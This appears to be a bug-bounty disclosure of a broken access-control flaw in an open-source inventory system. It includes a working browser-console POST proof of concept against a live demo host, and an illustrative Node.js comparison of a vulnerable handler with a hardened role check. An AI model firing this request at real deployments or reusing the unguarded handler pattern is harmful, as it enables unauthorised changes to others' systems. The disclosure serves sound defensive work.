Improper Privilege Management in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Jul 31st 2021


💥 BUG

An unprivileged user (Basic role) can add a new inventory item by posting directly to the items/add endpoint, even though the UI hides that action from them.

💥 STEPS TO REPRODUCE

1. From the admin account, go to https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators and add a new user called user-B with the Basic role. A Basic user is not supposed to be able to add new items.
2. Log in as user-B. The items page shows no items to this user and offers no way to add one.
3. Still logged in as user-B, run the JavaScript below in the browser console. The request goes out with user-B's session cookie ("credentials": "include"), and the server accepts it and creates a new item:

// Run from user-B's browser console on the application's origin.
// The browser attaches user-B's session cookie; the server never checks the role.
await fetch("https://1410inc.xyz/mini-inventory-and-sales-management-system/items/add", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "https://1410inc.xyz/mini-inventory-and-sales-management-system/items",
    // Same form fields the admin "add item" form submits.
    "body": "itemName=jijk&itemQuantity=1&itemPrice=20&itemDescription=hghhj&itemCode=hjgj",
    "method": "POST",
    "mode": "cors"
});
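The root cause in the steps above is that the role restriction lives only in the user interface (the add-item form is hidden from Basic users) while the POST handler trusts whoever reaches it. The following is an added example written for this page, not code from the project (which is a PHP application); it is an illustrative Node.js model of a vulnerable handler beside a hardened one, plus the check a reviewer would run to confirm the fix. The role names, the session shape, the in-memory store and the ROLE_RANK table are all assumptions; the form body is the one from the PoC request above.

```javascript
// Added example, not the project's code. Models the missing server-side role
// check behind the report and the check that confirms it is fixed.

const ROLE_RANK = { basic: 1, admin: 2 }; // assumed role names and ordering

// Form body copied from the PoC request above.
const POC_BODY =
  'itemName=jijk&itemQuantity=1&itemPrice=20&itemDescription=hghhj&itemCode=hjgj';

// In-memory stand-in for the items table (constructed for the example).
function makeStore() {
  return { items: [], nextId: 1 };
}

// Parse and validate the x-www-form-urlencoded body; null on anything malformed.
function parseItemForm(rawBody) {
  const params = new URLSearchParams(rawBody);
  const form = {};
  for (const key of ['itemName', 'itemQuantity', 'itemPrice', 'itemDescription', 'itemCode']) {
    const value = params.get(key);
    if (value === null || value.trim() === '') return null;
    form[key] = value.trim();
  }
  form.itemQuantity = Number(form.itemQuantity);
  form.itemPrice = Number(form.itemPrice);
  if (!Number.isInteger(form.itemQuantity) || form.itemQuantity < 0) return null;
  if (!Number.isFinite(form.itemPrice) || form.itemPrice < 0) return null;
  return form;
}

// Vulnerable pattern: the handler assumes only admins reach it because the
// "add item" form is hidden from Basic users. session.role is never consulted,
// so a hand-crafted POST (like the fetch above) succeeds for any logged-in user.
function addItemVulnerable(store, session, rawBody) {
  const form = parseItemForm(rawBody);
  if (form === null) return { status: 400, body: { error: 'invalid item' } };
  const item = { id: store.nextId++, createdBy: session.user, ...form };
  store.items.push(item);
  return { status: 200, body: { ok: true, id: item.id } };
}

// Hardened pattern: a guard that checks the server-side session's role before
// the handler runs. A missing session or an unknown role is denied outright,
// not treated as rank zero and silently compared.
function requireRole(minRole, handler) {
  return (store, session, rawBody) => {
    const rank = session ? ROLE_RANK[session.role] : undefined;
    if (rank === undefined || rank < ROLE_RANK[minRole]) {
      return { status: 403, body: { error: 'forbidden' } };
    }
    return handler(store, session, rawBody);
  };
}
const addItemHardened = requireRole('admin', addItemVulnerable);

// Fix verification: replay the PoC as user-B (Basic role) against a handler and
// report whether the privilege boundary held (403 returned and nothing stored).
function privilegeEnforced(handler) {
  const store = makeStore();
  const res = handler(store, { user: 'user-B', role: 'basic' }, POC_BODY);
  return res.status === 403 && store.items.length === 0;
}

console.log('vulnerable handler enforces role:', privilegeEnforced(addItemVulnerable)); // false
console.log('hardened handler enforces role:  ', privilegeEnforced(addItemHardened));   // true
```

The guard wraps the handler rather than being a flag the view checks, so every route that mutates inventory can be protected the same way, and the check runs on the server's own session record instead of anything the client sends. Replaying the recorded PoC body against each privileged endpoint with a Basic-role session, as privilegeEnforced does, is the quickest regression check for this class of bug.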

💥 IMPACT

Any authenticated user with the Basic role can create inventory items. The role restriction is applied only in the user interface (the add form is hidden and no items are listed), while the server-side handler for items/add does not check the caller's role, so a single crafted POST with the user's session cookie bypasses it.

Occurrences

We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 2 years ago
Amir validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir marked this as fixed with commit ba36f6 2 years ago
Amir has been awarded the fix bounty
This vulnerability will not receive a CVE